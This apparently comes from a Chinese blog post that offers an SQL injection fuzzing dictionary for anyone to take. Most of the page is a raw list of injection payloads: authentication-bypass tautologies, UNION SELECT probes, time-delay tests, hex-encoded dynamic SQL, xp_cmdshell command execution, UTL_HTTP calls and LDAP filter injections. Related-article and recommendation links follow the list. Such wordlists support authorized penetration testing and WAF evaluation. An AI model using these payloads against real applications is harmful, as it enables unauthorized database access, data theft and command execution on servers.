需要的自取

'

"

#

-

--

' --

--';

' ;

= '

= ;

= --

\x23

\x27

\x3D \x3B'

\x3D \x27

\x27\x4F\x52 SELECT *

\x27\x6F\x72 SELECT *

'or select *

admin'--

';shutdown--

<>"'%;)(&+

' or ''='

' or 'x'='x

" or "x"="x

') or ('x'='x

0 or 1=1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 1=1--

" or 1=1--

' or '1'='1'--

"' or 1 --'"

or 1=1--

or%201=1

or%201=1 --

' or 1=1 or ''='

" or 1=1 or ""="

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

'hi' or 'x'='x';

@variable

,@variable

PRINT

PRINT @@variable

select

insert

as

or

procedure

limit

order by

asc

desc

delete

update

distinct

having

truncate

replace

like

handler

bfilename

' or username like '%

' or uname like '%

' or userid like '%

' or uid like '%

' or user like '%

exec xp

exec sp

'; exec master..xp_cmdshell

'; exec xp_regread

t'exec master..xp_cmdshell 'nslookup www.google.com'--

--sp_password

\x27UNION SELECT

' UNION SELECT

' UNION ALL SELECT

' or (EXISTS)

' (select top 1

'||UTL_HTTP.REQUEST

1;SELECT%20*

to_timestamp_tz

tz_offset

&lt;&gt;&quot;'%;)(&amp;+

'%20or%201=1

%27%20or%201=1

%20$(sleep%2050)

%20'sleep%2050'

char%4039%41%2b%40SELECT

&apos;%20OR

'sqlattempt1

(sqlattempt2)

|

%7C

*|

%2A%7C

*(|(mail=*))

%2A%28%7C%28mail%3D%2A%29%29

*(|(objectclass=*))

%2A%28%7C%28objectclass%3D%2A%29%29

(

%28

)

%29

&

%26

!

%21

' or 1=1 or ''='

' or ''='

x' or 1=1 or 'x'='y

/

//

//*

*/*

'

' and '' like '

' AnD '' like '

' or '' like '

' and '' like '%

' aND '' like '%

' and '' like ''--

' and 2>1--

' and 2>3--

') and ('x'='x

) and (1=1

'or''='

'or'='or'

a' or 1=1--

"a"" or 1=1--"

 or a = a

a' or 'a' = 'a

1 or 1=1

a' waitfor delay '0:0:10'--

1 waitfor delay '0:0:10'--

declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)

declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)

declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)

declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)

a'

?

' or 1=1

‘ or 1=1 --

x' AND userid IS NULL; --

x' AND email IS NULL; --

anything' OR 'x'='x

x' AND 1=(SELECT COUNT(*) FROM tabname); --

x' AND members.email IS NULL; --

x' OR full_name LIKE '%Bob%

23 OR 1=1

'; exec master..xp_cmdshell 'ping 172.10.1.255'--

'

'%20or%20''='

'%20or%20'x'='x

%20or%20x=x

')%20or%20('x'='x

0 or 1=1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

 or 0=0 #"

or 0=0 #

' or 1=1--

" or 1=1--

' or '1'='1'--

' or 1 --'

or 1=1--

or%201=1

or%201=1 --

' or 1=1 or ''='

 or 1=1 or ""=

' or a=a--

 or a=a

') or ('a'='a

) or (a=a

hi or a=a

hi or 1=1 --"

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

"hi"") or (""a""=""a"

'hi' or 'x'='x';

@variable

,@variable

PRINT

PRINT @@variable

select

insert

as

or

procedure

limit

order by

asc

desc

delete

update

distinct

having

truncate

replace

like

handler

bfilename

' or username like '%

' or uname like '%

' or userid like '%

' or uid like '%

' or user like '%

exec xp

exec sp

'; exec master..xp_cmdshell

'; exec xp_regread

t'exec master..xp_cmdshell 'nslookup www.google.com'--

--sp_password

\x27UNION SELECT

' UNION SELECT

' UNION ALL SELECT

' or (EXISTS)

' (select top 1

'||UTL_HTTP.REQUEST

1;SELECT%20*

to_timestamp_tz

tz_offset

<>"'%;)(&+

'%20or%201=1

%27%20or%201=1

%20$(sleep%2050)

%20'sleep%2050'

char%4039%41%2b%40SELECT

&apos;%20OR

'sqlattempt1

(sqlattempt2)

|

%7C

*|

%2A%7C

*(|(mail=*))

%2A%28%7C%28mail%3D%2A%29%29

*(|(objectclass=*))

%2A%28%7C%28objectclass%3D%2A%29%29

(

%28

)

%29

&

%26

!

%21

' or 1=1 or ''='

' or ''='

x' or 1=1 or 'x'='y

/

//

//*

*/*

a' or 3=3--

"a"" or 3=3--"

' or 3=3

‘ or 3=3 --

SQL注入Fuzzing字典的更多相关文章

  1. SQL注入fuzz字典

    length Length + handler likeLiKe selectSeleCT sleepSLEEp databaseDATABASe delete having oroR asAs -~ ...

  2. 深入理解SQL注入绕过WAF和过滤机制

    知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...

  3. DAY5 DVWA之SQL注入演练(low)

    1.设置 把安全等级先调整为low,让自己获得点信心,免得一来就被打脸. 2.测试和分析页面的功能       这里有一个输入框 根据上面的提示,输入用户的id.然后我们输入之后,发现它返回了关于这个 ...

  4. 深入了解SQL注入绕过waf和过滤机制

    知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filter的实现及Evasion 0x04 延伸及测试向量示例 ...

  5. 见招拆招:绕过WAF继续SQL注入常用方法

    Web Hacker总是生存在与WAF的不断抗争之中的,厂商不断过滤,Hacker不断绕过.WAF bypass是一个永恒的话题,不少基友也总结了很多奇技怪招.那今天我在这里做个小小的扫盲吧.先来说说 ...

  6. 仿5173游戏交易平台系统SQL注入(可直接脱裤)+Getshell

    最近没事登登好几年前玩过的游戏看看,发现有人喊高价收号,这一看就是骗子,这等骗子还想骗我?我就来看看这逗逼是怎么骗人的,结果发现这人给了一个说是 5173平台交易的网站,叫我直接把号的信息填上去然后填 ...

  7. 深入理解SQL注入绕过WAF与过滤机制

    知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...

  8. 『SQL注入』 User-Agent 手工注入的探测与利用分析

    原理很简单:后台在接收UA时没有对UA做过滤,也没有PDO进行数据交互(实际PDO是非常有必要的),导致UA中有恶意代码,最终在数据库中执行. Bug 代码: 本地顺手打了一个环境,Bug 代码部分: ...

  9. 实验吧_简单的sql注入_1、2、3

    简单的sql注入1 看着这个简单的界面,一时间没有特别好的思路,先输入一个1',发生了报错 初步猜测这是一个字符型的注入,他将我们输入的语句直接当成sql语句执行了,按题目的意思后面肯定过滤了很多注入 ...

  10. DVWA 黑客攻防演练(八)SQL 注入 SQL Injection

    web 程序中离不开数据库,但到今天 SQL注入是一种常见的攻击手段.如今现在一些 orm 框架(Hibernate)或者一些 mapper 框架( iBatis)会对 SQL 有一个更友好的封装,使 ...

随机推荐

  1. Note -「SOS DP」高维前缀和

    本文差不多算是翻译了一遍 CF blog?id=45223 就是抄了一遍,看不懂可以去原文. 当然我的翻译并不是完全遵从原文的. Part. 1 Introduction 平时我们怎么求高维前缀和?容 ...

  2. Springboot 实现QQ登录(界面跳转)

    Springboot 实现QQ登录(界面跳转) 现在第三方登录已经变成主流app的登录方式了 今天记录一下如何给自己的网站实现第三方登录(这里以QQ登录为例) 准备工作 首先确保你准备好你自己网站的域 ...

  3. python第2~5章 学习笔记

    # 第2~5章 学习笔记 ## 什么是计算机语言 计算机就是一台用来计算机的机器,人让计算机干什么计算机就得干什么! 需要通过计算机的语言来控制计算机(编程语言)! 计算机语言其实和人类的语言没有本质 ...

  4. NFC and Contactless Technologies

    NFC and Contactless Technologies NFC与无接触技术 NFC technology enables simple and safe two-way interactio ...

  5. openssl加解密实战

    一.概念 1.加密有两种类型 密钥加密(secret-key encryption)使用相同的密钥进行加密和解密,也叫对称加密 公钥加密(public-key encryption)使用不同的密钥进行 ...

  6. 19. 从零开始编写一个类nginx工具, 配置数据的热更新原理及实现

    wmproxy wmproxy是由Rust编写,已实现http/https代理,socks5代理, 反向代理,静态文件服务器,内网穿透,配置热更新等, 后续将实现websocket代理等,同时会将实现 ...

  7. Linux运维技能图谱

    前言 该技能图谱依个人经验绘制,不适用于所有运维岗位.对于刚入行的从业者,也不需要按照图谱全学一遍,应该根据岗位工作内容来学习.有些技术我也不会,但作为一个选项我也写进去了,比如容器运行时有Docke ...

  8. Util应用框架核心(三) - 服务注册器

    本节介绍服务注册器的开发. 如果你不需要扩展Util应用框架,直接跳过. 当你把某些功能封装到自己的类库,并希望启动时自动执行初始化代码进行配置时,定义服务注册器. 服务注册器概述 服务注册器是Uti ...

  9. 把 map 中的 key 由驼峰命名转为下划线

    import cn.hutool.core.util.StrUtil; /** * 把 map 中的 key 由驼峰命名转为下划线 */public HashMap<String, Object ...

  10. CSP-J 2023 题解

    CSP-J 2023 题解 T1 小苹果 这个题直接遍历枚举必定 TLE,这是 CCF 的出题风格,每题 T1 巨水无比,但是往往又需要一些思维. 这道题我们可以发现每一轮操作都会拿走 \(1 + ( ...